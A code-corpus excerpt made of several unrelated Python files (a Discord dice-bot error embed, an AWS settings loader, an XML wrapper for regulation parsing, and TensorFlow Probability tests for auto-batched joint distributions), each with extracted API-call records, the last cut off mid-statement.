2823), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_left', 'reg_left'], {'mask': 'mask_left'}), '(reg_left, reg_left, mask=mask_left)\n', (2787, 2823), False, 'import cv2\n'), ((2843, 2894), 'cv2.bitwise_and', 'cv2.bitwise_and', (['reg_down', 'reg_down'], {'mask': 'mask_down'}), '(reg_down, reg_down, mask=mask_down)\n', (2858, 2894), False, 'import cv2\n'), ((3514, 3600), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(k_left, k_top)', '(k_right, k_bottom)', '(255, 0, 255, 0.5)', '(2)'], {}), '(clone, (k_left, k_top), (k_right, k_bottom), (255, 0, 255, \n 0.5), 2)\n', (3527, 3600), False, 'import cv2\n'), ((3614, 3693), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(h_left, h_top)', '(h_right, h_bottom)', '(255, 0, 0, 0.5)', '(2)'], {}), '(clone, (h_left, h_top), (h_right, h_bottom), (255, 0, 0, 0.5), 2)\n', (3627, 3693), False, 'import cv2\n'), ((3713, 3792), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(s_left, s_top)', '(s_right, s_bottom)', '(0, 0, 255, 0.5)', '(2)'], {}), '(clone, (s_left, s_top), (s_right, s_bottom), (0, 0, 255, 0.5), 2)\n', (3726, 3792), False, 'import cv2\n'), ((3811, 3897), 'cv2.rectangle', 'cv2.rectangle', (['clone', '(f_left, f_top)', '(f_right, f_bottom)', '(0, 255, 255, 0.5)', '(2)'], {}), '(clone, (f_left, f_top), (f_right, f_bottom), (0, 255, 255, \n 0.5), 2)\n', (3824, 3897), False, 'import cv2\n'), ((3905, 4014), 'cv2.putText', 'cv2.putText', (['image_up', '"""W"""', '(k_left - 170, k_top + 110)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_up, 'W', (k_left - 170, k_top + 110), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (3916, 4014), False, 'import cv2\n'), ((4011, 4122), 'cv2.putText', 'cv2.putText', (['image_left', '"""A"""', '(h_left - 170, h_top + 200)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_left, 'A', (h_left - 170, h_top + 200), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4022, 4122), False, 'import cv2\n'), ((4119, 4231), 'cv2.putText', 'cv2.putText', (['image_right', '"""D"""', '(s_left - 170, s_top + 200)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_right, 'D', (s_left - 170, s_top + 200), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4130, 4231), False, 'import cv2\n'), ((4228, 4339), 'cv2.putText', 'cv2.putText', (['image_down', '"""S"""', '(f_left - 170, f_top + 110)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.9)', '(36, 255, 12)', '(2)'], {}), "(image_down, 'S', (f_left - 170, f_top + 110), cv2.\n FONT_HERSHEY_SIMPLEX, 0.9, (36, 255, 12), 2)\n", (4239, 4339), False, 'import cv2\n'), ((4337, 4382), 'cv2.namedWindow', 'cv2.namedWindow', (['"""video"""', 'cv2.WINDOW_AUTOSIZE'], {}), "('video', cv2.WINDOW_AUTOSIZE)\n", (4352, 4382), False, 'import cv2\n'), ((4390, 4416), 'cv2.imshow', 'cv2.imshow', (['"""video"""', 'clone'], {}), "('video', clone)\n", (4400, 4416), False, 'import cv2\n'), ((4542, 4562), 'pyautogui.keyUp', 'pyautogui.keyUp', (['key'], {}), '(key)\n', (4557, 4562), False, 'import pyautogui\n'), ((4783, 4806), 'pyautogui.keyUp', 'pyautogui.keyUp', (['"""left"""'], {}), "('left')\n", (4798, 4806), False, 'import pyautogui\n'), ((5003, 5017), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5014, 5017), False, 'import cv2\n'), ((4918, 4942), 'pyautogui.keyUp', 'pyautogui.keyUp', (['"""right"""'], {}), "('right')\n", (4933, 4942), False, 'import pyautogui\n')] |
# pylint: disable=function-redefined
from discord import File
from multipledispatch import dispatch
from fate_of_dice.common import DiceException
from fate_of_dice.resources.resource_handler import ResourceImageHandler
from .dice_embed import DiceEmbed
@dispatch(DiceException)
def from_exception(error: DiceException) -> {DiceEmbed, File}:
embed = DiceEmbed(description=str(error), colour=0xae6229)
embed.add_thumbnail(ResourceImageHandler.INNOVATION_IMAGE)
return {'embed': embed, 'file': embed.thumbnail_file()}
@dispatch(BaseException)
def from_exception(error: BaseException) -> {DiceEmbed, File}:
embed = DiceEmbed(description=str(error), title="Error", colour=0x000000)
embed.add_thumbnail(ResourceImageHandler.PROCESS_IMAGE)
return {'embed': embed, 'file': embed.thumbnail_file()}
| [
"multipledispatch.dispatch"
] | [((257, 280), 'multipledispatch.dispatch', 'dispatch', (['DiceException'], {}), '(DiceException)\n', (265, 280), False, 'from multipledispatch import dispatch\n'), ((533, 556), 'multipledispatch.dispatch', 'dispatch', (['BaseException'], {}), '(BaseException)\n', (541, 556), False, 'from multipledispatch import dispatch\n')] |
import os
from dotenv import load_dotenv
load_dotenv()
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_KEY = os.getenv('AWS_SECRET_KEY')
AWS_DEFAULT_REGION = os.getenv('AWS_DEFAULT_REGION')
| [
"os.getenv",
"dotenv.load_dotenv"
] | [((42, 55), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (53, 55), False, 'from dotenv import load_dotenv\n'), ((77, 107), 'os.getenv', 'os.getenv', (['"""AWS_ACCESS_KEY_ID"""'], {}), "('AWS_ACCESS_KEY_ID')\n", (86, 107), False, 'import os\n'), ((125, 152), 'os.getenv', 'os.getenv', (['"""AWS_SECRET_KEY"""'], {}), "('AWS_SECRET_KEY')\n", (134, 152), False, 'import os\n'), ((174, 205), 'os.getenv', 'os.getenv', (['"""AWS_DEFAULT_REGION"""'], {}), "('AWS_DEFAULT_REGION')\n", (183, 205), False, 'import os\n')] |
from copy import deepcopy
import six
from lxml import etree
from regparser import plugins
from regparser.tree.xml_parser.preprocessors import replace_html_entities
class XMLWrapper(object):
"""Wrapper around XML which provides a consistent interface shared by both
Notices and Annual editions of XML"""
def __init__(self, xml, source=None):
"""Includes automatic conversion from string and a deep copy for
safety. `source` represents the providence of this xml. It is _not_
serialized and hence does not follow the xml through the index"""
if isinstance(xml, six.binary_type):
xml = replace_html_entities(xml)
self.xml = etree.fromstring(xml)
elif isinstance(xml, etree._Element):
self.xml = deepcopy(xml)
else:
raise ValueError("xml should be either binary or an lxml node")
self.source = source
def preprocess(self):
"""Unfortunately, the notice xml is often inaccurate. This function
attempts to fix some of those (general) flaws. For specific issues, we
tend to instead use the files in settings.LOCAL_XML_PATHS"""
for plugin in plugins.instantiate_if_possible(
'eregs_ns.parser.preprocessors', method_name='transform'):
plugin(self.xml)
return self
def xpath(self, *args, **kwargs):
return self.xml.xpath(*args, **kwargs)
def xml_str(self):
return etree.tounicode(self.xml, pretty_print=True)
def _find_or_create(self, tag):
"""Look for the first matching tag present in the document. If it's
not present, create it by inserting it into the root"""
matches = self.xpath('//' + tag)
if matches:
return matches[0]
else:
return etree.SubElement(self.xml, tag)
| [
"copy.deepcopy",
"lxml.etree.SubElement",
"regparser.plugins.instantiate_if_possible",
"regparser.tree.xml_parser.preprocessors.replace_html_entities",
"lxml.etree.fromstring",
"lxml.etree.tounicode"
] | [((1191, 1284), 'regparser.plugins.instantiate_if_possible', 'plugins.instantiate_if_possible', (['"""eregs_ns.parser.preprocessors"""'], {'method_name': '"""transform"""'}), "('eregs_ns.parser.preprocessors',\n method_name='transform')\n", (1222, 1284), False, 'from regparser import plugins\n'), ((1474, 1518), 'lxml.etree.tounicode', 'etree.tounicode', (['self.xml'], {'pretty_print': '(True)'}), '(self.xml, pretty_print=True)\n', (1489, 1518), False, 'from lxml import etree\n'), ((643, 669), 'regparser.tree.xml_parser.preprocessors.replace_html_entities', 'replace_html_entities', (['xml'], {}), '(xml)\n', (664, 669), False, 'from regparser.tree.xml_parser.preprocessors import replace_html_entities\n'), ((693, 714), 'lxml.etree.fromstring', 'etree.fromstring', (['xml'], {}), '(xml)\n', (709, 714), False, 'from lxml import etree\n'), ((1820, 1851), 'lxml.etree.SubElement', 'etree.SubElement', (['self.xml', 'tag'], {}), '(self.xml, tag)\n', (1836, 1851), False, 'from lxml import etree\n'), ((784, 797), 'copy.deepcopy', 'deepcopy', (['xml'], {}), '(xml)\n', (792, 797), False, 'from copy import deepcopy\n')] |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the JointDistributionAutoBatched."""
import collections
import os
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_util
tfb = tfp.bijectors
tfd = tfp.distributions
JAX_MODE = False
Root = tfd.JointDistributionCoroutineAutoBatched.Root
@test_util.test_all_tf_execution_regimes
class JointDistributionAutoBatchedTest(test_util.TestCase):
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_batch_and_event_shape_with_plate(self, jd_class):
models = {}
def coroutine_model():
g = yield tfd.LogNormal(0., 1.)
df = yield tfd.Exponential(1.)
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., 1.),
tfd.Exponential(1.),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20),
lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', tfd.LogNormal(0., 1.)),
('df', tfd.Exponential(1.)),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1))))
joint = jd_class(models[jd_class], validate_args=True)
# Properties `event_shape` and `batch_shape` should be defined
# even before any sampling calls have occurred.
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[[], [], [20], [20]])
self.assertAllEqual(joint.batch_shape, [])
is_scalar = joint._model_flatten(joint.is_scalar_event())
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
event_shape = joint._model_flatten(joint.event_shape_tensor())
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [20])
self.assertAllEqual(event_shape[3], [20])
self.assertEqual(joint.is_scalar_batch(), True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape, [])
@parameterized.named_parameters(
*(dict( # pylint: disable=g-complex-comprehension
testcase_name=jd_type + '_' + sampler_type,
jd_class=getattr(tfd, 'JointDistribution' + jd_type + 'AutoBatched'),
sampler_type=sampler_type)
for jd_type in ('Coroutine', 'Sequential', 'Named')
for sampler_type in ('stateful', 'stateless')))
def test_model_with_nontrivial_batch_shape(self, jd_class, sampler_type):
models = {}
def coroutine_model():
g = yield tfd.LogNormal(0., [1., 2.])
df = yield tfd.Exponential([1., 2.])
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., [1., 2.]),
tfd.Exponential([1., 2.]),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20),
lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', tfd.LogNormal(0., [1., 2.])),
('df', tfd.Exponential([1., 2.])),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(tf.expand_dims(df, -1), loc, 1))))
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[[], [], [20], [20]])
self.assertAllEqual(joint.batch_shape, [2])
is_scalar = joint._model_flatten(joint.is_scalar_event())
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
self.assertAllEqual(joint.is_scalar_batch(), False)
batch_shape = self.evaluate(joint.batch_shape_tensor())
self.assertAllEqual(batch_shape, [2])
x = joint.sample([5], seed=test_util.test_seed(sampler_type=sampler_type))
lp = self.evaluate(joint.log_prob(x))
self.assertAllEqual(lp.shape, [5, 2])
def test_model_with_dynamic_batch_ndims(self):
if tf.executing_eagerly():
self.skipTest('Dynamic shape.')
def coroutine_model():
g = yield tfd.LogNormal(0., [1., 2.])
df = yield tfd.Exponential([1., 2.])
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.StudentT(tf.expand_dims(df, -1), loc, 1)
joint = tfd.JointDistributionCoroutineAutoBatched(
coroutine_model,
batch_ndims=tf1.placeholder_with_default(1, shape=[]),
validate_args=True)
batch_shape_tensor = self.evaluate(joint.batch_shape_tensor())
self.assertAllEqual(batch_shape_tensor, [2])
event_shape_tensor = self.evaluate(joint.event_shape_tensor())
self.assertAllEqual(event_shape_tensor[0], [])
self.assertAllEqual(event_shape_tensor[1], [])
self.assertAllEqual(event_shape_tensor[2], [20])
self.assertAllEqual(event_shape_tensor[3], [20])
self.assertAllEqual(joint.batch_shape, tf.TensorShape(None))
self.assertAllEqual(joint._model_flatten(joint.event_shape),
[tf.TensorShape(None)] * 4)
x = joint.sample([5], seed=test_util.test_seed(sampler_type='stateless'))
lp = self.evaluate(joint.log_prob(x))
self.assertAllEqual(lp.shape, [5, 2])
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'base_jd_class': tfd.JointDistributionCoroutine,
'jda_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'base_jd_class': tfd.JointDistributionSequential,
'jda_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'base_jd_class': tfd.JointDistributionNamed,
'jda_class': tfd.JointDistributionNamedAutoBatched})
def test_broadcast_ragged_batch_shape(self, base_jd_class, jda_class):
base_jd_models = {}
# Writing a JDC with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
def coroutine():
x = yield Root(tfd.Normal(0., scale=1.))
yield tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
base_jd_models[tfd.JointDistributionCoroutine] = coroutine
base_jd_models[tfd.JointDistributionSequential] = [
tfd.Normal(0., scale=1.),
lambda x: tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
]
base_jd_models[tfd.JointDistributionNamed] = {
'x': tfd.Normal(0., scale=1.),
'y': lambda x: tfd.Normal(x[..., tf.newaxis], [1., 2., 3., 4., 5.])
}
# But we can get equivalent behavior in a JDCA by expanding dims so that
# the batch dimensions line up.
jd_auto_models = {}
def coroutine_auto():
x = yield tfd.Normal(0., scale=[1.])
yield tfd.Normal(x, [1., 2., 3., 4., 5.])
jd_auto_models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_auto
jd_auto_models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., scale=[1.]),
lambda x: tfd.Normal(x, [1., 2., 3., 4., 5.])
]
jd_auto_models[tfd.JointDistributionNamedAutoBatched] = (
collections.OrderedDict((
('x', tfd.Normal(0., scale=[1.])),
('y', lambda x: tfd.Normal(x, [1., 2., 3., 4., 5.])))))
# Writing a JD with ragged batch shape will broadcast the first
# distribution over the second.
# (though note, this model breaks `log_prob` with nontrivial sample shape).
jd_broadcasting = base_jd_class(base_jd_models[base_jd_class])
# This model's broadcasting behavior is a footgun (it can break inference
# routines and cause silently incorrect optimization); it should be
# disallowed by `validate_args`.
with self.assertRaisesRegexp(
Exception,
('Component batch shapes are inconsistent|'
'Broadcasting probably indicates an error in model specification')):
jda_invalid = jda_class(jd_auto_models[jda_class],
batch_ndims=1, validate_args=True)
_ = self.evaluate(jda_invalid.log_prob(
jda_invalid.sample(seed=test_util.test_seed())))
# But, if the user wants to run with no guardrails, one can eke out
# performance wins when evaluating a shared value over multiple models.
jda_broadcasting = jda_class(jd_auto_models[jda_class], batch_ndims=1)
self.assertAllEqual(
jda_broadcasting._model_flatten(jda_broadcasting.event_shape),
[[], []])
self.assertAllEqual(jda_broadcasting.batch_shape, [5])
joint_sample = jda_broadcasting.sample(seed=test_util.test_seed())
x_sample, y_sample = self.evaluate(
list(joint_sample.values()) if hasattr(joint_sample, 'values')
else joint_sample)
# The model samples only a single value for x, shared across the batch.
self.assertAllEqual(x_sample.shape, [1])
self.assertAllEqual(y_sample.shape, [5])
lp_jd_broadcast = self.evaluate(jd_broadcasting.log_prob(
jd_broadcasting._model_unflatten([x_sample[..., 0], y_sample])))
lp_jda_broadcast = self.evaluate(jda_broadcasting.log_prob(
jda_broadcasting._model_unflatten([x_sample, y_sample])))
self.assertAllEqual(lp_jda_broadcast.shape, [5])
self.assertAllEqual(lp_jd_broadcast, lp_jda_broadcast)
# Try drawing multiple samples and computing log-prob.
joint_sample = self.evaluate(jda_broadcasting.sample(
[2, 3], seed=test_util.test_seed()))
lp_jda_broadcast = self.evaluate(jda_broadcasting.log_prob(joint_sample))
self.assertAllEqual(lp_jda_broadcast.shape, [2, 3, 5])
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_log_prob_and_prob_with_plate(self, jd_class):
models = {}
def coroutine_model():
a = yield tfd.Bernoulli(probs=0.5, dtype=tf.float32)
b = yield tfd.Sample(tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32), 2)
yield tfd.Normal(loc=a, scale=1. + b)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Bernoulli(probs=0.5, dtype=tf.float32),
lambda a: tfd.Sample(tfd.Bernoulli( # pylint: disable=g-long-lambda
probs=0.25 + 0.5*a, dtype=tf.float32), 2),
lambda b, a: tfd.Normal(loc=a, scale=1. + b)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('a', tfd.Bernoulli(probs=0.5, dtype=tf.float32)),
('b', lambda a: tfd.Sample(tfd.Bernoulli( # pylint: disable=g-long-lambda
probs=0.25 + 0.5*a, dtype=tf.float32), 2)),
('c', lambda b, a: tfd.Normal(loc=a, scale=1. + b))))
joint = jd_class(models[jd_class], validate_args=True)
z = self.evaluate(joint.sample(seed=test_util.test_seed()))
a, b, c = z.values() if hasattr(z, 'values') else z
log_prob = self.evaluate(joint.log_prob(z))
prob = self.evaluate(joint.prob(z))
expected_log_prob = self.evaluate(
np.log(0.5) +
tf.reduce_sum(tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 - 0.5 * a))) +
tf.reduce_sum(-0.5 * ((c - a) / (1. + b))**2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b))))
self.assertAllClose(log_prob, expected_log_prob)
self.assertAllClose(prob, np.exp(expected_log_prob))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_log_prob_multiple_samples(self, jd_class):
models = {}
def coroutine_model():
a = yield tfd.Bernoulli(probs=0.5, dtype=tf.float32)
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Bernoulli(probs=0.5, dtype=tf.float32),
lambda a: tfd.Bernoulli(probs=0.25 + 0.5*a, dtype=tf.float32),
lambda b, a: tfd.Normal(loc=a, scale=1. + b)
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('a', tfd.Bernoulli(probs=0.5, dtype=tf.float32)),
('b', lambda a: tfd.Bernoulli(probs=0.25 + 0.5*a, dtype=tf.float32)),
('c', lambda b, a: tfd.Normal(loc=a, scale=1. + b))))
joint = jd_class(models[jd_class], validate_args=True)
z = joint.sample(4, seed=test_util.test_seed())
log_prob = joint.log_prob(z)
a, b, c = z.values() if hasattr(z, 'values') else z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_sample_and_log_prob(self, jd_class):
# Define a bijector to detect if/when `inverse` is called.
inverted_values = []
class InverseTracingExp(tfb.Exp):
def _inverse(self, y):
inverted_values.append(y)
return tf.math.log(y)
models = {}
def coroutine_model():
g = yield InverseTracingExp()(tfd.Normal(0., 1.), name='g')
df = yield tfd.Exponential(1., name='df')
loc = yield tfd.Sample(tfd.Normal(0, g), 20, name='loc')
yield tfd.StudentT(df, loc, 1, name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
InverseTracingExp()(tfd.Normal(0., 1.), name='g'),
tfd.Exponential(1., name='df'),
lambda _, g: tfd.Sample(tfd.Normal(0, g), 20, name='loc'),
lambda loc, df: tfd.StudentT(df, loc, 1, name='x')
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('g', InverseTracingExp()(tfd.Normal(0., 1.))),
('df', tfd.Exponential(1.)),
('loc', lambda g: tfd.Sample(tfd.Normal(0, g), 20)),
('x', lambda loc, df: tfd.StudentT(df, loc, 1))))
joint = jd_class(models[jd_class], validate_args=True)
seed = test_util.test_seed(sampler_type='stateless')
for sample_shape in ([], [5]):
inverted_values.clear()
x1, lp1 = self.evaluate(
joint.experimental_sample_and_log_prob(
sample_shape,
seed=seed,
df=2.7)) # Check that kwargs are supported.
x2 = self.evaluate(
joint.sample(sample_shape, seed=seed, df=2.7))
self.assertAllCloseNested(x1, x2)
self.assertLen(inverted_values, 0)
lp2 = joint.log_prob(x1)
self.assertLen(inverted_values, 1)
self.assertAllClose(lp1, lp2)
@test_util.jax_disable_test_missing_functionality('b/157594634')
def test_sample_distributions(self):
def coroutine_model():
g = yield tfd.Normal(0., 1., name='g')
df = yield tfd.Exponential(1., name='df')
loc = yield tfd.Normal(tf.zeros([20]), g, name='loc')
yield tfd.StudentT(df, loc, 1, name='x')
joint = tfd.JointDistributionCoroutineAutoBatched(coroutine_model)
ds, xs = joint.sample_distributions([4, 3], seed=test_util.test_seed())
for d, x in zip(ds, xs):
self.assertGreaterEqual(len(d.batch_shape), 2)
lp = d.log_prob(x)
self.assertAllEqual(lp.shape[:2], [4, 3])
@test_util.jax_disable_test_missing_functionality('b/201586404')
def test_sample_distributions_not_composite_tensor_raises_error(self):
def coroutine_model():
yield tfd.TransformedDistribution(tfd.Normal(0., 1.),
tfb.Exp(),
name='td')
joint = tfd.JointDistributionCoroutineAutoBatched(coroutine_model)
# Sampling with trivial sample shape avoids the vmap codepath.
ds, _ = joint.sample_distributions([], seed=test_util.test_seed())
self.assertIsInstance(ds[0], tfd.TransformedDistribution)
with self.assertRaisesRegex(
TypeError, r'Some component distribution\(s\) cannot be returned'):
joint.sample_distributions([4, 3], seed=test_util.test_seed())
def test_sample_with_batch_value(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
a = yield tfd.Sample(tfd.Normal(0, 1.), 2)
b = yield tfd.Sample(tfd.Normal(0, 1.), 3)
# The following line fails if not autovectorized.
yield tfd.Normal(a[tf.newaxis, ...] * b[..., tf.newaxis], 1.)
x = self.evaluate(dist.sample(123, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(value=x, seed=test_util.test_seed()))
self.assertAllCloseNested(x, x2)
# Also test a dict-type value (JDNamed).
dist = tfd.JointDistributionNamedAutoBatched({
'a': tfd.Sample(tfd.Normal(0, 1.), 2),
'b': tfd.Sample(tfd.Normal(0, 1.), 3),
'c': lambda a, b: tfd.Normal( # pylint: disable=g-long-lambda
a[tf.newaxis, ...] * b[..., tf.newaxis], 1.)})
x = self.evaluate(dist.sample(123, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(value=x, seed=test_util.test_seed()))
self.assertAllCloseNested(x, x2)
def test_sample_with_value_as_kwarg(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
a = yield tfd.Sample(tfd.Normal(0, 1.), 2, name='a')
b = yield tfd.Sample(tfd.Normal(0, 1.), 3, name='b')
# The following line fails if not autovectorized.
yield tfd.Normal(a[tf.newaxis, ...] * b[..., tf.newaxis], 1., name='c')
x = self.evaluate(dist.sample(4, seed=test_util.test_seed()))
x2 = self.evaluate(dist.sample(seed=test_util.test_seed(), a=x.a))
self.assertAllClose(x.a, x2.a)
self.assertAllEqual(x2.b.shape, [4, 3])
self.assertAllEqual(x2.c.shape, [4, 3, 2])
@parameterized.named_parameters(
dict(testcase_name='stateful', sampler_type='stateful'),
dict(testcase_name='stateless', sampler_type='stateless'))
def test_sample_with_partially_specified_value(self, sampler_type):
num_features = 5
def dist():
scale_variance = yield tfd.InverseGamma(0.5, 0.5)
scale_noncentered = yield tfd.Sample(tfd.HalfNormal(1.), num_features)
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield tfd.Sample(tfd.Normal(0., 1.), num_features)
yield tfd.Deterministic(weights_noncentered * scale)
joint = tfd.JointDistributionCoroutineAutoBatched(dist, validate_args=True)
value_partial_batch_dim = 4
value_ = (3.,
None,
None,
np.ones([value_partial_batch_dim, num_features]))
value = [None if v is None else tf.cast(v, tf.float32) for v in value_]
# The sample should keep the specified values.
xs = self.evaluate(
joint.sample(
value=value, seed=test_util.test_seed(sampler_type=sampler_type)))
self.assertAllEqual(xs[0], tf.fill([value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, [value_partial_batch_dim, num_features])
self.assertAllEqual(xs[2].shape, [value_partial_batch_dim, num_features])
self.assertAllEqual(xs[3], value[3])
# With sample shape.
sample_shape = [6, 2]
samples = joint.sample(sample_shape, value=value,
seed=test_util.test_seed(sampler_type=sampler_type))
xs = self.evaluate(samples)
expect_shp = sample_shape + [value_partial_batch_dim, num_features]
self.assertAllEqual(
xs[0], tf.fill(sample_shape + [value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, expect_shp)
self.assertAllEqual(xs[2].shape, expect_shp)
self.assertAllEqual(xs[3], value[3] * tf.ones(expect_shp))
sample_shape_dynamic = tf1.placeholder_with_default(
sample_shape, shape=None)
samples = joint.sample(sample_shape_dynamic, value=value,
seed=test_util.test_seed(sampler_type=sampler_type))
xs = self.evaluate(samples)
self.assertAllEqual(
xs[0], tf.fill(sample_shape + [value_partial_batch_dim], value[0]))
self.assertAllEqual(xs[1].shape, expect_shp)
self.assertAllEqual(xs[2].shape, expect_shp)
self.assertAllEqual(xs[3], value[3] * tf.ones(expect_shp))
@parameterized.named_parameters(
dict(testcase_name='stateful', sampler_type='stateful'),
dict(testcase_name='stateless', sampler_type='stateless'))
def test_sample_with_prefix_of_values(self, sampler_type):
num_rows = 4
num_columns = 5
def dist():
a = yield tfd.Sample(tfd.Normal(0., 1.), num_rows, name='a')
b = yield tfd.Sample(tfd.Normal(0., 1.), num_columns, name='b')
yield tfd.Normal(a[..., None] * b[None, ...], 1., name='c')
tuple_joint = tfd.JointDistributionCoroutineAutoBatched(
dist, validate_args=True)
namedtuple_joint = tfd.JointDistributionCoroutineAutoBatched(
dist,
sample_dtype=collections.namedtuple(
'ModelSpec', ['a', 'b', 'c'])(
a=tf.float32, b=tf.float32, c=tf.float32),
validate_args=True)
value_partial_batch_dim = 3
v0 = 3. * np.ones([value_partial_batch_dim, num_rows]).astype(np.float32)
# Tuple (or namedtuple) value contains only the first variable.
tuple_value = (v0,)
namedtuple_value = collections.namedtuple('ValueSpec', ['a'])(a=v0)
for joint in (tuple_joint, namedtuple_joint):
for value in (tuple_value, namedtuple_value):
xs = self.evaluate(
joint.sample(value=value,
